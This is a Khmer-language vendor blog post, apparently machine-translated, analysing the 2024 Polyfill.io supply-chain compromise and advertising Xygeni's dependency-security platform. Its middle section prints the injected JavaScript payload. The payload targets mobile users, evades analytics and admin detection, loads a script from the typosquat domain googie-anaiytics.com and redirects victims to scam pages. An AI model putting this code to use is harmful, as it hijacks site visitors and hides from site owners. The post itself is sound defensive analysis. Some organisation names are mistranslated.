នៅខែកុម្ភៈ 2024, នេះ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill.io- ឧទាហរណ៍ដ៏សំខាន់មួយនៃ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី—បានធ្វើឲ្យគេហទំព័រជាង 100,000 កន្លែងរងការវាយប្រហារទូទាំងពិភពលោក។ ហេតុការណ៍នេះពាក់ព័ន្ធនឹង ការលួចយកកញ្ចប់ជាកន្លែងដែល FUNNULL ដែលជាអង្គភាពព្យាបាទ ទទួលបានការគ្រប់គ្រងលើដែន និងឃ្លាំង GitHub របស់ Polyfill ដោយចាក់មេរោគចូលទៅក្នុងសេវាកម្ម។ មេរោគនេះកំណត់គោលដៅជាពិសេសលើអ្នកប្រើប្រាស់ទូរស័ព្ទចល័ត ដោយបញ្ជូនពួកគេទៅកាន់គេហទំព័រល្បែងស៊ីសងក្លែងក្លាយដោយកេងប្រវ័ញ្ចភាពងាយរងគ្រោះនៅក្នុងការចែកចាយលេខកូដថាមវន្តរបស់ Polyfill ដោយផ្អែកលើបឋមកថា HTTP និងភ្នាក់ងារអ្នកប្រើប្រាស់។
ការវិភាគបច្ចេកទេស៖ របៀបដែលការវាយប្រហារ Polyfill ដំណើរការ
Polyfill ត្រូវបានគេប្រើប្រាស់យ៉ាងទូលំទូលាយ ដើម្បីធានាបាននូវភាពឆបគ្នារវាងមុខងារគេហទំព័រទំនើបៗ និងកម្មវិធីរុករកចាស់ៗ។ អ្នកវាយប្រហារបានប្រើ ការលួចយកកញ្ចប់ ដោយការទិញ cdn.polyfill.io ដែន និងការបង្កប់ស្គ្រីបព្យាបាទ។ អ្វីដែលធ្វើឱ្យការវាយប្រហារនេះមានគ្រោះថ្នាក់ខ្លាំងគឺឥរិយាបថដ៏ស្មុគស្មាញរបស់មេរោគ៖
- ការបង្កើតកូដថាមវន្តសេវាកម្មរបស់ Polyfill បានបង្កើតការឆ្លើយតប JavaScript ផ្ទាល់ខ្លួនដោយផ្អែកលើឧបករណ៍ដែលចូលប្រើគេហទំព័រ (ឧទាហរណ៍ ទូរស័ព្ទចល័តទល់នឹងកុំព្យូទ័រលើតុ) បឋមកថា HTTP និងភ្នាក់ងារអ្នកប្រើប្រាស់។ អ្នកវាយប្រហារបានកេងចំណេញពីលក្ខណៈថាមវន្តនេះ ដោយចាក់បញ្ចូលបន្ទុកមេរោគដែលត្រូវបានរចនាឡើងសម្រាប់ឧបករណ៍ជាក់លាក់ - ជាពិសេសទូរស័ព្ទចល័ត។
- បច្ចេកទេសគេចវេសមេរោគនេះឆ្លាតណាស់។ វាបានពន្យារពេលប្រតិបត្តិការនៅពេលដែលសេវាកម្មវិភាគដូចជា Google Analytics ត្រូវបានរកឃើញ ដែលរារាំងសកម្មភាពរបស់វាពីការបង្ហាញក្នុងស្ថិតិគេហទំព័រ។ លើសពីនេះ វាមិនបានធ្វើឱ្យសកម្មទេ ប្រសិនបើអ្នកប្រើប្រាស់ជាអ្នកគ្រប់គ្រង ឬអ្នកអភិវឌ្ឍន៍ត្រូវបានរកឃើញ ដែលជៀសវាងការរកឃើញមុនក្នុងអំឡុងពេលបំបាត់កំហុស ឬការសាកល្បង។
- ការបញ្ជូនបន្តតាមទូរស័ព្ទចល័តនៅពេលដែលបានធ្វើឱ្យសកម្ម មេរោគបានបញ្ជូនអ្នកប្រើប្រាស់ទៅកាន់គេហទំព័រល្បែងស៊ីសងក្លែងក្លាយដោយក្លែងបន្លំជាដូមេនស្របច្បាប់ (ឧ. googie-anaiytics.com)។ អ្នកវាយប្រហារថែមទាំងបានរៀបចំបង្អួចពេលវេលាដើម្បីកាត់បន្ថយការសង្ស័យ ដោយប្រតិបត្តិបន្ទុកទិន្នន័យតែក្នុងអំឡុងពេលជាក់លាក់មួយចំនួនប៉ុណ្ណោះ ដើម្បីចាប់អ្នកប្រើប្រាស់ទូរស័ព្ទចល័តដែលមិនបានសង្ស័យឲ្យភ្ញាក់។
គេហទំព័រធំៗបំផុតរងការវាយប្រហារដោយ Polyfill
ចំពោះ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill បានប៉ះពាល់ដល់គេហទំព័រជាង 100,000 រួមទាំងអង្គការធំៗដូចជា៖
- វេទិកាសេដ្ឋកិច្ចពិភពលោក
- វិចារណញាណ
- JSTOR
- ធនាគារអៀរឡង់
- ធនាគារិក Coldwell
- ជាតិផ្សាយផ្ទាល់។
- សាកលវិទ្យាល័យ Brandeis
- ក្រុមហ៊ុនអាកាសយានដ្ឋានឌូបៃ
- មូលនិធិការពារបរិស្ថាន
ជនរងគ្រោះល្បីៗទាំងនេះ គូសបញ្ជាក់ពីវិសាលភាពសកលនៃការវាយប្រហារ និងភាពងាយរងគ្រោះរបស់ ស្ថាប័នធំៗចំពោះការបំពានខ្សែសង្វាក់ផ្គត់ផ្គង់.
ការព្រមាន និងការឆ្លើយតបដំបូង
អាន់ឌ្រូ ប៊ែតស៍ដែលជាអ្នកបង្កើតដើមរបស់ Polyfill បានព្រមានអ្នកអភិវឌ្ឍន៍ជាច្រើនខែមុនការវាយប្រហារនេះថា ឈប់ប្រើប្រាស់សេវាកម្ម Polyfill បន្ទាប់ពីគាត់បានបាត់បង់ការគ្រប់គ្រងលើដែន។ ការព្រមានរបស់គាត់ភាគច្រើនមិនត្រូវបានគេយកចិត្តទុកដាក់រហូតដល់ការវាយប្រហាររបស់ FUNNULL បានចាប់ផ្តើម។ នៅពេលដែលត្រូវបានរកឃើញ បណ្តាញចែកចាយខ្លឹមសារដូចជា Cloudflare និង Fastly បានផ្តល់ជម្រើសដែលមានសុវត្ថិភាព ខណៈពេលដែល Betts បានបញ្ជាក់ជាថ្មីនូវដំបូន្មានរបស់គាត់សម្រាប់អ្នកអភិវឌ្ឍន៍ឱ្យលុបឯកសារយោង Polyfill ទាំងស្រុង។
គ្មានគេហទំព័រណាមួយសព្វថ្ងៃនេះតម្រូវឱ្យមាន polyfills ណាមួយនៅក្នុងនោះទេ https://t.co/3xHecLPXkB បណ្ណាល័យ។ មុខងារភាគច្រើនដែលបានបន្ថែមទៅក្នុងវេទិកាគេហទំព័រត្រូវបានអនុម័តយ៉ាងឆាប់រហ័សដោយកម្មវិធីរុករកសំខាន់ៗទាំងអស់ ដោយមានករណីលើកលែងមួយចំនួនដែលជាទូទៅមិនអាចបំពេញបានឡើយ ដូចជា Web Serial និង Web Bluetooth។
— អេនឌ្រូ ប៊ែតស៍ (@triblondon) ថ្ងៃទី១១ ខែកុម្ភៈ ឆ្នាំ២០២៥
ឧទាហរណ៍នៃបន្ទុកផ្ទុកមេរោគ Polyfill
ដើម្បីបង្ហាញពីភាពស្មុគស្មាញនៃការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill សាន់សេ បានផ្តល់ឧទាហរណ៍លម្អិតនៃ payload ដែលមានគំនិតអាក្រក់ដែលបានប្រើ។ payload នេះបានសម្របខ្លួនដោយថាមវន្តដោយផ្អែកលើឧបករណ៍របស់អ្នកប្រើប្រាស់ ដោយបង្កឱ្យមានការបញ្ជូនបន្តទៅកាន់គេហទំព័រក្លែងបន្លំ និងប្រើប្រាស់បច្ចេកទេសដើម្បីគេចពីការរកឃើញ។ ដើម្បីមើលឱ្យកាន់តែច្បាស់អំពីការវិភាគបច្ចេកទេសនៃ payload នេះ អ្នកអាចពិនិត្យមើល សាន់សេក ការវិភាគពេញលេញ និងគំរូកូដព្យាបាទ។
function isPc() {
try {
var _isWin =
navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac =
navigator.platform == "Mac68K" ||
navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" ||
navigator.platform == "MacIntel";
if (_isMac || _isWin) {
return true;
} else {
return false;
}
} catch (_0x44e1f6) {
return false;
}
}
function vfed_update(_0x5ae1f8) {
_0x5ae1f8 !== "" &&
loadJS(
"https://www.googie-anaiytics.com/html/checkcachehw.js",
function () {
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
}
);
}
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();
if (
_curHost.indexOf("www.dxtv1.com") !== -1 ||
_curHost.indexOf("www.ys752.com") !== -1
) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_hours >= 0 && _hours < 2) {
if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
} else {
if (_hours >= 2 && _hours < 4) {
_rnd <= 15 && (_redirectURL = _kuurzaBitGet);
} else {
if (_hours >= 4 && _hours < 7) {
_rnd <= 20 && (_redirectURL = _kuurzaBitGet);
} else {
_hours >= 7 && _hours < 8
? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
: _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
}
}
}
}
}
}
_redirectURL != "" &&
!isPc() &&
document.cookie.indexOf("admin_id") == -1 &&
document.cookie.indexOf("adminlevels") == -1 &&
vfed_update(_redirectURL);
}
}
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();
ហេតុអ្វីបានជាការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill កើតឡើង?
ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill គូសបញ្ជាក់ពីភាពសំខាន់ ភាពងាយរងគ្រោះនៅក្នុងការពឹងផ្អែករបស់ភាគីទីបី ការគ្រប់គ្រង។ ប្រព័ន្ធអេកូឡូស៊ី JavaScript ទំនើបពឹងផ្អែកយ៉ាងខ្លាំងទៅលើបណ្ណាល័យប្រភពបើកចំហ ហើយអ្នកអភិវឌ្ឍន៍ច្រើនតែប្រើឧបករណ៍ដូចជា npm ដើម្បីរួមបញ្ចូលបណ្ណាល័យទាំងនេះដោយស្វ័យប្រវត្តិ។ បើគ្មានការធ្វើសវនកម្មយ៉ាងម៉ត់ចត់ ឬការត្រួតពិនិត្យជាបន្តបន្ទាប់ទេ កញ្ចប់ដែលរងការសម្របសម្រួលអាចរអិលចេញដោយមិនអាចរកឃើញ ដូចដែលបានឃើញជាមួយ Polyfill។
លើសពីនេះ ល្បឿននៃការអភិវឌ្ឍ និងការដាក់ពង្រាយយ៉ាងឆាប់រហ័សនៅក្នុងបរិយាកាសកម្មវិធីសព្វថ្ងៃនេះ ជារឿយៗផ្តល់អាទិភាពដល់មុខងារ និងល្បឿនលើសពីការត្រួតពិនិត្យសុវត្ថិភាពយ៉ាងហ្មត់ចត់។ អ្នកវាយប្រហារទាញយកប្រយោជន៍ពីចន្លោះប្រហោងនេះ ដោយកំណត់គោលដៅបណ្ណាល័យពេញនិយមដើម្បីបង្កើនផលប៉ះពាល់របស់ពួកគេ។ ក្នុងករណី Polyfill នៅពេលដែលអ្នកវាយប្រហារទទួលបានការគ្រប់គ្រងលើដែន ពួកគេបានទាញយកអត្ថប្រយោជន៍ពីការប្រើប្រាស់យ៉ាងទូលំទូលាយរបស់បណ្ណាល័យ ដើម្បីចាក់កូដព្យាបាទនៅទូទាំងគេហទំព័រមួយចំនួនធំ។
ឧប្បត្តិហេតុនេះបង្ហាញពីសារៈសំខាន់នៃការអនុវត្តវិធានការសន្តិសុខដ៏តឹងរ៉ឹង ដូចជាឧបករណ៍សវនកម្មភាពអាស្រ័យ ការត្រួតពិនិត្យពេលវេលាជាក់ស្តែង និងផែនការឆ្លើយតបឧប្បត្តិហេតុដ៏រឹងមាំ ដើម្បីការពារប្រឆាំងនឹងការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីស្រដៀងគ្នា។ អង្គការនានាត្រូវតែផ្តល់អាទិភាពដល់សុវត្ថិភាពនៅក្នុងលំហូរការងារអភិវឌ្ឍន៍របស់ពួកគេ ដើម្បីការពារប្រព័ន្ធអេកូឡូស៊ីឌីជីថលរបស់ពួកគេប្រកបដោយប្រសិទ្ធភាព។
ការទប់ស្កាត់ការវាយប្រហារនាពេលអនាគត៖ ការគ្រប់គ្រងការពឹងផ្អែកដ៏រឹងមាំ
នៅពេលគ្រប់គ្រងភាពអាស្រ័យ ស៊ីហ្គេនី Open Source Security វេទិកា ប្រើស្រទាប់ការពារច្រើនស្រទាប់ ដែលត្រូវបានរចនាឡើងដើម្បីរកឃើញ ធ្វើឱ្យនៅដាច់ដោយឡែក និងជួសជុលសមាសធាតុព្យាបាទក្នុងពេលវេលាជាក់ស្តែង និងជៀសវាងការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី។
ការរកឃើញមេរោគតាមពេលវេលាជាក់ស្តែង៖ Xygeni តាមដានការចុះឈ្មោះសាធារណៈជាបន្តបន្ទាប់ ដោយស្កេនរកលេខកូដគួរឱ្យសង្ស័យមុនពេលវាចូលទៅក្នុងបរិយាកាសអភិវឌ្ឍន៍។ នេះអនុញ្ញាតឱ្យមានការទប់ស្កាត់ការគំរាមកំហែងដូចជាការវាយប្រហារ Polyfill ដូចដែលបានគូសបញ្ជាក់នៅក្នុង របស់ ល្វីស រ៉ូឌ្រីហ្គេស ស៊េរីអត្ថបទ។
ការជូនដំណឹងដោយស្វ័យប្រវត្តិ និងការដាក់ឱ្យនៅដាច់ដោយឡែក៖ Xygeni ញែកកញ្ចប់ដែលរងការសម្របសម្រួលដោយស្វ័យប្រវត្តិ និងបង្កើតការជូនដំណឹង ដែលអនុញ្ញាតឱ្យក្រុមអភិវឌ្ឍន៍ធ្វើសកម្មភាពបានយ៉ាងឆាប់រហ័ស។ ដោយការរួមបញ្ចូលជាមួយ CI/CD pipelineការគំរាមកំហែងណាមួយអាចត្រូវបានបញ្ឈប់មុនពេលវាឈានដល់ការផលិត។ ក្នុងករណីដូចជាឧប្បត្តិហេតុ Polyfill មុខងារនេះការពារផលប៉ះពាល់យ៉ាងទូលំទូលាយដោយការបញ្ឈប់កូដព្យាបាទតាំងពីដំបូង។
ការផ្តល់អាទិភាពថាមវន្ត & SBOM៖ Xygeni ផ្តល់អាទិភាពដល់ភាពងាយរងគ្រោះដោយផ្អែកលើបរិបទ ភាពងាយរងគ្រោះ និងផលប៉ះពាល់អាជីវកម្ម។ ដោយបង្កើត វិក្កយបត្រសម្ភារៈកម្មវិធីពេលវេលាជាក់ស្តែង (SBOM)អង្គការនានាអាចតាមដានសមាសធាតុភាគីទីបីទាំងអស់ ដោយធានាបាននូវតម្លាភាពពេញលេញ។ ការត្រួតពិនិត្យពេលវេលាជាក់ស្តែងនេះគឺមានសារៈសំខាន់នៅពេលគ្រប់គ្រងការពឹងផ្អែកប្រភពបើកចំហ ដែលអនុញ្ញាតឱ្យមានការឆ្លើយតបយ៉ាងរហ័សចំពោះឧប្បត្តិហេតុដូចជាការលួចចូលប្រព័ន្ធរបស់ Polyfill។
នៅក្នុងស៊េរីអត្ថបទដោយ Luis Rodriguez, ផ្តោតលើ ការការពារសកម្ម ប្រឆាំងនឹងកញ្ចប់ប្រភពបើកចំហដែលមានគំនិតអាក្រក់ត្រូវបានពិភាក្សាលម្អិត។ វិធីសាស្រ្តរបស់ Xygeni មិនត្រឹមតែគ្របដណ្តប់លើការរកឃើញពេលវេលាជាក់ស្តែងប៉ុណ្ណោះទេ ប៉ុន្តែថែមទាំងផ្តល់នូវផ្លូវជួសជុលដោយស្វ័យប្រវត្តិផងដែរ ដែលអនុញ្ញាតឱ្យអង្គការនានាត្រលប់ទៅកំណែសុវត្ថិភាពវិញដោយមិនរំខានដល់ផលិតកម្ម។
ពិនិត្យមុនពេលចេញ កញ្ចប់ព្យាបាទប្រភពបើកចំហ ស៊េរីអត្ថបទនៅទីនេះ ដើម្បីស្វែងយល់បន្ថែមអំពីរបៀបដែល Xygeni គ្រប់គ្រងសុវត្ថិភាពប្រភពបើកចំហ។
ការពារការពឹងផ្អែកប្រភពបើកចំហរបស់អ្នកពីមេរោគ
ស្វែងយល់ពីយុទ្ធសាស្ត្រសកម្មដើម្បីការពារកម្មវិធីប្រភពបើកចំហរបស់អ្នកពីការគំរាមកំហែងពីមេរោគ។ ទាញយកឯកសារសរបស់យើងសម្រាប់ការយល់ដឹងសំខាន់ៗអំពីការការពារមេរោគ។
មេរៀនពីការវាយប្រហារ Polyfill
ចំពោះ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill.io បង្រៀនមេរៀនសំខាន់ៗអំពីហានិភ័យនៃការពឹងផ្អែករបស់ភាគីទីបីក្នុងការអភិវឌ្ឍគេហទំព័រទំនើប។
- ការប្រុងប្រយ័ត្នក្នុងការពឹងផ្អែករបស់ភាគីទីបីនេះជាចំណុចសំខាន់បំផុត។ អង្គការនានាត្រូវតែ ពិនិត្យ ពិនិត្យ និងតាមដានជាប្រចាំ បណ្ណាល័យភាគីទីបីទាំងអស់ដែលពួកគេប្រើប្រាស់។ ការពឹងផ្អែកខ្លាំងពេកលើការពឹងផ្អែកដែលមិនបានត្រួតពិនិត្យអាចធ្វើឱ្យប្រព័ន្ធប្រឈមនឹងហានិភ័យធ្ងន់ធ្ងរ។
- វិធានការសន្តិសុខសកម្ម: ការត្រួតពិនិត្យជាបន្តបន្ទាប់ ដូចជាជាមួយ ការរកឃើញការគំរាមកំហែងតាមពេលវេលាជាក់ស្តែងរបស់ Xygeniអាចរកឃើញចំណុចខ្សោយបានទាន់ពេលវេលា។
- អប់រំនិងបណ្តុះបណ្តាលការធ្វើឲ្យសមាជិកក្រុមទាំងអស់ទទួលបានព័ត៌មានថ្មីៗអំពីការគំរាមកំហែងថ្មីៗបំផុតជួយពង្រឹងសុវត្ថិភាពរបស់អង្គការ។
ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill បម្រើជាការរំលឹកដ៏មានឥទ្ធិពលមួយអំពីការគំរាមកំហែងដែលកំពុងកើនឡើងដែលបង្កឡើងដោយ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីការវាយប្រហារទាំងនេះទាញយកប្រយោជន៍ពីភាពងាយរងគ្រោះនៅក្នុងសមាសធាតុភាគីទីបីដែលប្រើប្រាស់យ៉ាងទូលំទូលាយ ដែលធ្វើឱ្យអង្គការគ្រប់ទំហំងាយរងគ្រោះ។ តាមរយៈការអនុម័តវិធានការសុវត្ថិភាពជាមុន ដូចជា ការត្រួតពិនិត្យពេលវេលាពិតប្រាកដ, ការរកឃើញការគំរាមកំហែងដោយស្វ័យប្រវត្តិនិង ការគ្រប់គ្រងការពឹងផ្អែកដ៏រឹងមាំ—ដូចជាក្រុមហ៊ុនដែលផ្តល់ជូនដោយ Xygeni — ក្រុមហ៊ុននានាអាចការពារខ្លួនពីការគំរាមកំហែងស្រដៀងគ្នានេះនាពេលអនាគត។ ការប្រុងប្រយ័ត្នខ្ពស់ និងការរក្សាការត្រួតពិនិត្យយ៉ាងទូលំទូលាយលើបណ្ណាល័យភាគីទីបី គឺជាគន្លឹះក្នុងការទប់ស្កាត់ការសម្របសម្រួលទ្រង់ទ្រាយធំដូចជា Polyfill។
ធានាសុវត្ថិភាពការពឹងផ្អែកប្រភពបើកចំហរបស់អ្នកពីការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី
កុំឲ្យកម្មវិធីរបស់អ្នកក្លាយជាជនរងគ្រោះនៃការ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី ដូចជា Polyfill។ Xygeni's Open Source Security វេទិកា ផ្តល់ជូននូវការត្រួតពិនិត្យពេលវេលាជាក់ស្តែង ការធ្វើផែនទីការពឹងផ្អែកកម្រិតខ្ពស់ និងការកែតម្រូវដោយស្វ័យប្រវត្តិ ដើម្បីការពារការអភិវឌ្ឍន៍របស់អ្នក។ pipelineពីកញ្ចប់ដែលរងការសម្របសម្រួល។
គ្រប់គ្រងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីរបស់អ្នកនៅថ្ងៃនេះ។ រក្សាទុកការបង្ហាញ និងមើលពីរបៀបដែល Xygeni អាចការពារអង្គការរបស់អ្នកពីការគំរាមកំហែងនាពេលអនាគត។







